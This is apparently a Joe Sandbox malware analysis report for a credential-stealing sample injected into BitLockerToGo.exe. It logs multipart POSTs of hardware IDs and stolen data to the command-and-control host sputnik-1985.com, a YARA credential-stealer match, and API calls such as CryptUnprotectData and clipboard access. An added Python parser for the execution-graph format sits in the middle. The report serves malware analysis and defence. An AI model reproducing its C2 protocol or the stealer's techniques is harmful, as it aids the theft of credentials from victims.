Content-Disposition: form-data; name="pid"

2
--NR6WZU599JG4CJFS1
Content-Disposition: form-data; name="lid"

HpOoIh--2a727a03

Timestamp: 2025-01-07 05:01:59 UTC | Bytes transferred: 1125 | Direction: IN
Data:
HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 05:01:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=pq1ejlgi7386euksdd6bg1v0gh; expires=Fri, 02 May 2025 22:48:38 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WYqDrTFunqpIk8eCTgnEZVlZCijeAy4badMjpIv%2Bx38dfyOZxpQ95G2tuf06uqGkgZqM%2FF9bb2YycZBArFzVFhoZ24ciQCX0RWgp4V83JZT%2F8kVZMudjmC3BD1FNC08dcZH6"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe1649ace13729f-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1974&min_rtt=1967&rtt_var=752&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2840&recv_bytes=16012&delivery_rate=1441263&cwnd=169&unsent_bytes=0&cid=5f341bc51cb1c459&ts=493&x=0"

Timestamp: 2025-01-07 05:01:59 UTC | Bytes transferred: 20 | Direction: IN
Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii:
f
ok 8.46.123.189

Timestamp: 2025-01-07 05:01:59 UTC | Bytes transferred: 5 | Direction: IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii:
0


Session ID: 5
Source IP: 192.168.2.12
Source Port: 49719
Destination IP: 104.21.112.14
Destination Port: 443
PID: 6484
Process: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp: 2025-01-07 05:02:00 UTC | Bytes transferred: 281 | Direction: OUT
Data:
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=L84VY24J9K91LVK0A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20248
Host: sputnik-1985.com

Timestamp: 2025-01-07 05:02:00 UTC | Bytes transferred: 15331 | Direction: OUT
Data Ascii (decoded from the truncated raw hex dump):
--L84VY24J9K91LVK0A
Content-Disposition: form-data; name="hwid"

8A6CA42990BFD5D420A4C476FD51BCB1
--L84VY24J9K91LVK0A
Content-Disposition: form-data; name="pid"

3
--L84VY24J9K91LVK0A
Content-Disposition: form-data; name="lid"

HpOoIh--2a727a03

Timestamp: 2025-01-07 05:02:00 UTC | Bytes transferred: 4917 | Direction: OUT
Data Ascii: Fb}n8:,0c</XR-T<u}r()B{~&'2YU=#Q>|

Timestamp: 2025-01-07 05:02:00 UTC | Bytes transferred: 1123 | Direction: IN
Data:
HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 05:02:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=3e2c0rk2eat5245q1otd4lre5r; expires=Fri, 02 May 2025 22:48:39 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2QaIQSBksgfF8Pwo6%2BXN8FexVUzaGt2doxtFO0e1dOvJXxn9Xc7uBkPu8sVYAoOavxBcTLTni2CV56euWIlH5PWZLDKjlhan%2Bgb55u0tcn2A9KbwmHiVOSgCCWWZsPa1MQzd"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe164a2993d424b-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1562&min_rtt=1560&rtt_var=589&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21209&delivery_rate=1851616&cwnd=248&unsent_bytes=0&cid=664eab85e4327ecb&ts=512&x=0"

Timestamp: 2025-01-07 05:02:00 UTC | Bytes transferred: 20 | Direction: IN
Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii:
f
ok 8.46.123.189

Timestamp: 2025-01-07 05:02:00 UTC | Bytes transferred: 5 | Direction: IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii:
0


Session ID: 6
Source IP: 192.168.2.12
Source Port: 49720
Destination IP: 104.21.112.144
Destination Port: 443
PID: 6484
Process: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-07 05:02:02 UTC | 274 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=IWA9NYINFDT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1184
Host: sputnik-1985.com
2025-01-07 05:02:02 UTC | 1184 | OUT | Data Raw: 2d 2d 49 57 41 39 4e 59 49 4e 46 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 36 43 41 34 32 39 39 30 42 46 44 35 44 34 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 49 57 41 39 4e 59 49 4e 46 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 49 57 41 39 4e 59 49 4e 46 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 0d 0a 2d 2d 49 57 41 39 4e 59 49 4e 46 44
Data Ascii: --IWA9NYINFDTContent-Disposition: form-data; name="hwid"8A6CA42990BFD5D420A4C476FD51BCB1--IWA9NYINFDTContent-Disposition: form-data; name="pid"1--IWA9NYINFDTContent-Disposition: form-data; name="lid"HpOoIh--2a727a032c4d--IWA9NYINFD
2025-01-07 05:02:02 UTC | 1122 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 05:02:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=khfoskp0fnq1luvf6108gqssjo; expires=Fri, 02 May 2025 22:48:41 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zVha2KZFxYrwHAVyn8OLxodQCV%2BQlwrjM0KnCc6g%2BMVwHuJlVD5rC5KS6V2BB798jqrueOUVhxXHXEJM5ByLI6L2CntUUgBvbzd95rB7JtQG8q%2Flf2J5MhbHsMHA3i7CmQow"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe164aefa6443b3-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1597&rtt_var=617&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2094&delivery_rate=1746411&cwnd=203&unsent_bytes=0&cid=ec217eb52249d6ce&ts=745&x=0"
2025-01-07 05:02:02 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-07 05:02:02 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 7
Source IP: 192.168.2.12
Source Port: 49721
Destination IP: 104.21.112.144
Destination Port: 443
PID: 6484
Process: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-07 05:02:03 UTC | 281 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=31SWZHMOWET50R8LPR
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1123
Host: sputnik-1985.com
2025-01-07 05:02:03 UTC | 1123 | OUT | Data Raw: 2d 2d 33 31 53 57 5a 48 4d 4f 57 45 54 35 30 52 38 4c 50 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 36 43 41 34 32 39 39 30 42 46 44 35 44 34 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 33 31 53 57 5a 48 4d 4f 57 45 54 35 30 52 38 4c 50 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 31 53 57 5a 48 4d 4f 57 45 54 35 30 52 38 4c 50 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37
Data Ascii: --31SWZHMOWET50R8LPRContent-Disposition: form-data; name="hwid"8A6CA42990BFD5D420A4C476FD51BCB1--31SWZHMOWET50R8LPRContent-Disposition: form-data; name="pid"1--31SWZHMOWET50R8LPRContent-Disposition: form-data; name="lid"HpOoIh--2a727
2025-01-07 05:02:04 UTC | 1118 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 05:02:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=3pigodhnou5f3npue3kcougblq; expires=Fri, 02 May 2025 22:48:42 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xZbRrcrG%2FpBnG0JW1olWriMogfmJ1E3QAjdflrjZSstzkGkiwUjGktfHmL0ZvOi7pe6I1qUCujkZYomK9HivT29VhomN3tS2E7PhfuHZZNohH0mI3Ie2xnC5HOyvVXkb1Qta"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe164b769c843b3-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1518&min_rtt=1507&rtt_var=587&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2040&delivery_rate=1829573&cwnd=203&unsent_bytes=0&cid=96bf941c937000ce&ts=812&x=0"
2025-01-07 05:02:04 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-07 05:02:04 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 8
Source IP: 192.168.2.12
Source Port: 49722
Destination IP: 104.21.112.144
Destination Port: 443
PID: 6484
Process: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-07 05:02:04 UTC | 265 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 121
Host: sputnik-1985.com
2025-01-07 05:02:04 UTC | 121 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 38 41 36 43 41 34 32 39 39 30 42 46 44 35 44 34 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31
Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--2a727a032c4d&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=8A6CA42990BFD5D420A4C476FD51BCB1
2025-01-07 05:02:05 UTC | 1120 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 05:02:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=p2ppsm8dvh3i7g0tjjfqtj7t0q; expires=Fri, 02 May 2025 22:48:43 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C2BeFSGfXBh8hM8trcJxGDcx0xDO7ru9VdNKSheLsl944d0MNW0vk2Wf5SMEiWysgZbqv%2FerGB%2F1KhdhyY8ll1BE82i7PPlO9uMiSUI6edP3nNioPVdaAb9mJ7Qtnj9B3F4z"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe164bfcbc0729f-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1955&min_rtt=1950&rtt_var=741&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1022&delivery_rate=1466599&cwnd=169&unsent_bytes=0&cid=ddb54e68632c6dda&ts=501&x=0"
2025-01-07 05:02:05 UTC | 54 | IN | Data Raw: 33 30 0d 0a 6b 72 65 62 72 69 6b 46 4b 57 57 36 71 36 76 69 55 32 43 65 4d 32 2b 41 71 39 30 36 68 64 34 59 67 4d 44 64 69 5a 68 59 62 69 48 4a 36 67 3d 3d 0d 0a
Data Ascii: 30krebrikFKWW6q6viU2CeM2+Aq906hd4YgMDdiZhYbiHJ6g==
2025-01-07 05:02:05 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0

Target ID:0
Start time:00:01:13
Start date:07/01/2025
Path:C:\Users\user\Desktop\NjFiIQNSid.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\NjFiIQNSid.exe"
Imagebase:0x20000
File size:6'870'528 bytes
MD5 hash:29CA15934B67B18A91254CE253A588CA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:4
Start time:00:01:47
Start date:07/01/2025
Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Imagebase:0xef0000
File size:231'736 bytes
MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.2820648610.000000000319D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.2820715380.0000000003150000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:moderate
Has exited:true

Strings
• runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtemplate: %s:%d: %stoo many open filestoo much pixel dataunclosed left parenunexpected %s in %sunexpected g statusunknown Go ty, xrefs: 000539BB
• runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=transform: input and output are not identicaltransitioning GC to the same state as before?tried to run scavenger from another goroutineunsafe.String: ptr is nil and len i, xrefs: 00053AAC
• CreateWaitableTimerEx when creating timer failedbufio: writer returned negative count from Writecould not find GetSystemTimeAsFileTime() syscalldivision of zero by zero or infinity by infinityfail to read symbol table: %d aux symbols unreadgocron: .Every() int, xrefs: 00053AE0
• bad g0 stackbad recoveryblacksquare;block clausecaller errorcan't happencas64 failedchan receivecircledcirc;circleddash;close notifycontent-typecontext.TODOcurlyeqprec;curlyeqsucc;decode arraydecode slicediamondsuit;dumping heapempty numberend tracegcentersys, xrefs: 00053A2A
• %, xrefs: 00053B44
• runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptimezone hour outside of range [0,23]too many Additionals to pack (>65535)t, xrefs: 00053B3B
• runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 00053A51
• VirtualQuery for stack base failedadding nil Certificate to CertPoolbad wiretype for oneof field in %Tcrypto/aes: invalid buffer overlapcrypto/rsa: missing public modulusdoaddtimer: P already set in timerdriver: remove argument from queryforEachP: sched.safePo, xrefs: 00053A85
• runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=transform: input and output are not identicaltransitioning GC to the same state as before?tried to run scavenger from another, xrefs: 00053B07
Memory Dump Source
• Source File: 00000000.00000002.2737058535.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_NjFiIQNSid.jbxd
Strings
• p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC)) at entry+, elemsize=, npages = -syncWithWU.WithCancel/dev/stderr/dev/stdout/index.html0123456789_30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bernoullis;BoundIm, xrefs: 00063977
• releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontoo many, xrefs: 000639C1
• releasep: m=runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinespreadMethodspreadmethodstdDeviationstddeviationstraightphi;succcurlyeq;succnapprox;sun_eu_greeksurfaceScalesurfacescalesweepWaitersthickapprox;traceStringstransmitfileunexpect, xrefs: 00063909
• m->p= max= min= next= p->m= prev= span=% util%s: %s%v: %s' for '"&<>, xrefs: 0006392B
Memory Dump Source
• Source File: 00000000.00000002.2737058535.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_NjFiIQNSid.jbxd

Execution Graph

Execution Coverage: 8.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 73.2%
Total number of Nodes: 369
Total number of Limit Nodes: 30
execution_graph (call graph rendered in the report; listed here by entry node, with the API-calling nodes reached from it; internal edges omitted)

408640: 408664 GetCurrentProcessId GetCurrentThreadId; 408690 SHGetSpecialFolderPathW; 43bc9a RtlAllocateHeap; 408797 GetForegroundWindow; 40c660 CoInitializeEx; exit path 4088e6 ExitProcess
42b842: 42b90b GetComputerNameExA
42c282: 42c34d GetPhysicallyInstalledSystemMemory
40dc41: via 4237d0 and 423a60: 423876 RtlExpandEnvironmentStrings, 423939 RtlExpandEnvironmentStrings, 43fa50/43d910 LdrInitializeThunk, 43bc90 RtlAllocateHeap, 43bcb0 RtlFreeHeap; via 425850: 43d880 (RtlAllocateHeap, RtlFreeHeap), 440480 (RtlAllocateHeap, RtlFreeHeap), 43fa50/43d910 LdrInitializeThunk; via 426000: 43d910 LdrInitializeThunk, 43bc90 RtlAllocateHeap, 43bcb0 RtlFreeHeap; via 426340: 4409e0/440d70/440e50/43d910 LdrInitializeThunk, 43bc90 RtlAllocateHeap, 43bcb0 RtlFreeHeap; via 427cb0: 427d86 RtlExpandEnvironmentStrings, 427e38 RtlExpandEnvironmentStrings, 440d70/4409e0 LdrInitializeThunk; via 432d70: OpenClipboard, 432d9a GetClipboardData, 432db7 GlobalLock, 432e0e GetWindowLongW, 432fb8 GlobalUnlock, 432fc8 CloseClipboard. The same seven callees are then invoked a second time from 40dd56 onward (summary nodes: 4237d0 5 API calls, 423a60 4 API calls, 425850 3 API calls, 426000 3 API calls, 426340 3 API calls, 427cb0 3 API calls, 432d70 6 API calls)
43db42: 43d910 LdrInitializeThunk
4209c0: 440ba0 -> 43d910 LdrInitializeThunk
436805: 436831 GetUserDefaultUILanguage
42de0c: 414110 -> 42de11 CoSetProxyBlanket
42b94d: 42b959 GetComputerNameExA
4229cd: 4231c0 RtlExpandEnvironmentStrings; 42328c RtlExpandEnvironmentStrings; 423591 GetLogicalDrives; 421060 (3 API calls); 440ba0 LdrInitializeThunk; 43d910 LdrInitializeThunk
43e19a: 43d910 LdrInitializeThunk
40a11b: 40ad90 -> 43d880 (2 API calls)
409d5e: 409e16 LoadLibraryExW
40c69e: CoInitializeSecurity
419362: 43d910 LdrInitializeThunk; 4197d1 CryptUnprotectData
43bce0: 43d910 LdrInitializeThunk; 43bc90 RtlAllocateHeap; 43bcb0 RtlFreeHeap
43e6a5: GetForegroundWindow
43dce9: 43d910 LdrInitializeThunk
418df1: 440ba0 LdrInitializeThunk
4316b2: CoSetProxyBlanket
43e471: 43d910 LdrInitializeThunk
4384f0: 43d910 LdrInitializeThunk
42c736: 43d910 LdrInitializeThunk
40d6f8: via 438860: 438890 CoCreateInstance; 438af5 SysAllocString; 438b8b CoSetProxyBlanket; 438bab SysAllocString; 438ca8 SysAllocString; 438d17 VariantInit; 438e8e VariantClear; 438ea9 SysFreeString SysFreeString; 438ec5 SysFreeString; 438ee5 GetVolumeInformationW
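Joe Sandbox exports the execution graph as a flat token stream: a decimal node id followed by a hex address starts a node, any further words up to the next node or edge are that node's API names (or an "N API calls" summary for a collapsed callee), and "a->b" tokens are edges. The Python below is an added example, not part of Joe Sandbox or of the analysed sample, that parses that stream and lists the API calls reachable from each entry node. Its sample input is a fragment of this report's graph (the 408640 component plus one summary node), embedded inline; the function and class names are my own.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Constructed sample: the first nodes of this report's execution_graph plus one of its
# "N API calls" summary nodes, copied as printed (a fragment, not the whole graph).
SAMPLE_GRAPH = (
    "execution_graph 13911 408640 13913 40864f 13911->13913 13912 4088e6 ExitProcess "
    "13913->13912 13914 408664 GetCurrentProcessId GetCurrentThreadId 13913->13914 "
    "13923 4088ca 13913->13923 13915 408690 SHGetSpecialFolderPathW 13914->13915 "
    "13916 40868c 13914->13916 13917 408770 13915->13917 13916->13915 13917->13917 "
    "13924 43bc90 13917->13924 13919 408797 GetForegroundWindow 13921 408811 "
    "13919->13921 13921->13923 13927 40c660 CoInitializeEx 13921->13927 13923->13912 "
    "13928 43f000 13924->13928 13926 43bc9a RtlAllocateHeap 13926->13919 "
    "13929 43f010 13928->13929 13929->13926 13929->13929 "
    "13953 40dd1b 13954 4237d0 5 API calls 13953->13954"
)

_DECIMAL = re.compile(r"\d+")
_ADDRESS = re.compile(r"[0-9a-fA-F]{6,8}")
_EDGE = re.compile(r"(\d+)->(\d+)")
_SUMMARY = re.compile(r"\d+ API calls")   # collapsed subgraph, not a real API name


@dataclass
class Node:
    addr: int
    labels: List[str] = field(default_factory=list)

    @property
    def apis(self) -> List[str]:
        """Label words as API names; a summary label ("5 API calls") yields none."""
        return [] if _SUMMARY.fullmatch(" ".join(self.labels)) else list(self.labels)


@dataclass
class Graph:
    nodes: Dict[int, Node] = field(default_factory=dict)     # insertion order = dump order
    succ: Dict[int, List[int]] = field(default_factory=dict)  # edges in dump order


def parse_execution_graph(text: str) -> Graph:
    """'<id> <hexaddr> [label ...]' starts a node; '<a>-><b>' is an edge."""
    toks = text.split()
    g, cur, i = Graph(), None, 0
    while i < len(toks):
        t = toks[i]
        m = _EDGE.fullmatch(t)
        if m:
            g.succ.setdefault(int(m.group(1)), []).append(int(m.group(2)))
            i += 1
            continue
        if _DECIMAL.fullmatch(t) and i + 1 < len(toks) and _ADDRESS.fullmatch(toks[i + 1]):
            cur = int(t)
            g.nodes[cur] = Node(addr=int(toks[i + 1], 16))
            i += 2
            continue
        if cur is not None:                 # anything else labels the current node
            g.nodes[cur].labels.append(t)
        i += 1
    return g


def roots(g: Graph) -> List[int]:
    """Nodes without incoming edges: the entry of each component, in dump order."""
    targets = {b for bs in g.succ.values() for b in bs}
    return [n for n in g.nodes if n not in targets]


def api_nodes(g: Graph) -> List[Tuple[str, List[str]]]:
    """(hex address, [API names]) for every node that names at least one API."""
    return [(f"{n.addr:06x}", n.apis) for n in g.nodes.values() if n.apis]


def reachable_apis(g: Graph, root: int) -> List[str]:
    """API names met on a preorder DFS from root, following edges in dump order."""
    seen, out = set(), []

    def visit(n: int) -> None:
        if n in seen or n not in g.nodes:
            return
        seen.add(n)
        out.extend(g.nodes[n].apis)
        for s in g.succ.get(n, []):
            visit(s)

    visit(root)
    return out


if __name__ == "__main__":
    g = parse_execution_graph(SAMPLE_GRAPH)
    for r in roots(g):
        print(f"{g.nodes[r].addr:06x}: {reachable_apis(g, r)}")
```

The traversal is recursive, which is fine for a 369-node graph like this report's; for much larger dumps replace it with an explicit stack. Self-loops such as 13917->13917 and back-edges are handled by the visited set.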

Control-flow Graph

control_flow_graph for function 438860 (basic-block graph rendered in the report, blocks 0-81; the blocks that call out, in address order):
438a98-438aef CoCreateInstance
438b5b-438b85 SysAllocString
438b8b-438ba5 CoSetProxyBlanket
438be5-438c65 SysAllocString
438ca8-438cd5 SysAllocString
438d17-438d62 VariantInit
438e0f-438e4d call 407ed0, call 408d20
438e7d-438e8a call 407ee0
438e8e-438e9b VariantClear
438ea9-438eb9 SysFreeString * 2
438ec5-438ed1 SysFreeString
438ed5-438f01 call 43f450, GetVolumeInformationW
43903c-43906d call 41dc90
439082-439092 call 408060
APIs
• CoCreateInstance.OLE32(0044368C,00000000,00000001,0044367C), ref: 00438AE7
• SysAllocString.OLEAUT32(k2`0), ref: 00438B60
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438B9D
• SysAllocString.OLEAUT32(07B705B3), ref: 00438BEA
• SysAllocString.OLEAUT32(09C50FBD), ref: 00438CAD
• VariantInit.OLEAUT32(EFEEEDF4), ref: 00438D1C
• VariantClear.OLEAUT32(?), ref: 00438E8F
• SysFreeString.OLEAUT32(?), ref: 00438EB3
• SysFreeString.OLEAUT32(?), ref: 00438EB9
• SysFreeString.OLEAUT32(00000000), ref: 00438EC6
• GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00438EFA
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
• String ID: ,./,$S$]E$]E$b>c<$k2`0$x;
• API String ID: 2573436264-4038474941
• Opcode ID: 31b644112a68f3d18aacb8b5db5a05eceaae594e11df8e9f15bced72581e9853
• Instruction ID: 6e5b62aa8b1ec0da306810ad309870e49cdd1aa0d64757ab7dc6e3fbd6c770b3
• Opcode Fuzzy Hash: 31b644112a68f3d18aacb8b5db5a05eceaae594e11df8e9f15bced72581e9853
